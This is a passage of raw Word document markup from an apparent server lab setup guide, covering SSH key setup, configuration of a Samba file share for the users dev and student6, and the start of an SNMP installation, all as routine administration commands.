            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A9">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Your identification has been saved in /home/dev/.ssh/id_rsa</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AA">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Your public key has been saved in /home/dev/.ssh/id_rsa.pub</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AB">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The key fingerprint is:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AC">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SHA256:vsyMsbrxwzLSM/qsPWwMMijkNQQhkYV24qYnsdEsywE dev@eh-test-server</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AD">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The key's randomart image is:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AE">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+---[RSA 3072]----+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AF">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|oB+              |</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B0">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|Eo o             |</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B1">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|+o+              |</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B2">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|+=oo             |</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B3">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|B*o .   S        |</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B4">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|Xoo    .         |</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B5">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        |</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B6">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.o@ooB .       |</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B7">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o**O+.=        |</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B8">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="200"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+----[SHA256]-----+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 / 2:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table22"/>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touch authorized_keys</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BE">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chmod 600 authorized_keys</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BF">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echo ssh-rsa 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 dev@ip-10-1-0-132 &gt;&gt; authorized_keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_d56ktbdfz5vz" w:id="44"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.5.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Install and Configure Samba/CIFS File Share</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 / 6:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table23"/>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sudo apt install samba -y</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table24"/>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samba -V</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 / 6:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table25"/>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sudo mkdir -p /tmp/share</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table26"/>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sudo nano /etc/samba/smb.conf</w:t>
              <w:br w:type="textWrapping"/>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D5">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#Add this</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D6">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[share]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D7">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comment = Samba share directory</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D8">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path = /tmp/share</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D9">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read only = no</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DA">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writable = yes</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DB">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browseable = yes</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DC">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guest ok = no</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">   valid users = @dev @student6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 / 6:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table27"/>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sudo smbpasswd -a dev</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">## I set it for student6 account as well</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E2">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sudo smbpasswd -a dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4 / 6:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table28"/>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sudo apt-get install acl</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table29"/>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sudo setfacl -R -m "u:new_user:rwx" /tmp/share</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5 / 6:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table30"/>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testparm</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F2">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Load smb config files from /etc/samba/smb.conf</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F3">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Loaded services file ok</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F7">
      <w:pPr>
        <w:spacing w:after="200" w:before="200"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8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 6 / 6:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table31"/>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sudo ufw allow samba</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table32"/>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sudo systemctl restart smbd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000202">
      <w:pPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000203">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_62tmvrsarhvm" w:id="45"/>
      <w:bookmarkEnd w:id="45"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.6.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Install and Configure SNMP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000204">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 / 7:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table33"/>
        <w:tblW w:w="8204.999999999998"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04"/>
        <w:gridCol w:w="1727.9999999999998"/>
        <w:gridCol w:w="2448"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1725"/>
            <w:gridCol w:w="2304"/>
            <w:gridCol w:w="1727.9999999999998"/>
            <w:gridCol w:w="2448"/>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student6@ip-10-1-0-132:/$</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> sudo apt install snmp snmpd snmp-mibs-downloader -y</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000206">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student6@ip-10-1-0-132:/$</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> snmpd --version</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000207">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08">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NET-SNMP version:  5.8</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000209">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Web:           </w:t>
              <w:tab/>
              <w:t xml:space="preserve">http://www.net-snmp.org/</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020A">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Email:         </w:t>
              <w:tab/>
              <w:t xml:space="preserve">net-snmp-coders@lists.sourceforge.net</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 / 7:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table34"/>
        <w:tblW w:w="823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35"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="8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student6@ip-10-1-0-132:~$</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> sudo download-mibs</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000210">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11">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Downloading documents and extracting MIB files.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000212">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This will take some minutes.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000213">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14">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In case this process fails, it can always be repeated later by executing</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000215">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/usr/bin/download-mibs again.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000216">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17">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RFC1155-SMI: 119 lines.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000218">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RFC1213-MIB: 2613 lines.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000219">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NOTE: SMUX: ignored.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021A">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SMUX-MIB: 158 lines.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">[Further output omitted]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021C">
      <w:pPr>
        <w:spacing w:before="20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21D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 / 7:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021E">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table35"/>
        <w:tblW w:w="82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0"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="8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Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"># agentaddress: The IP address and port number that the agent will listen on.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000220">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">#   By default the agent listens to any and all traffic from any</w:t>
            </w:r>
          </w:p>
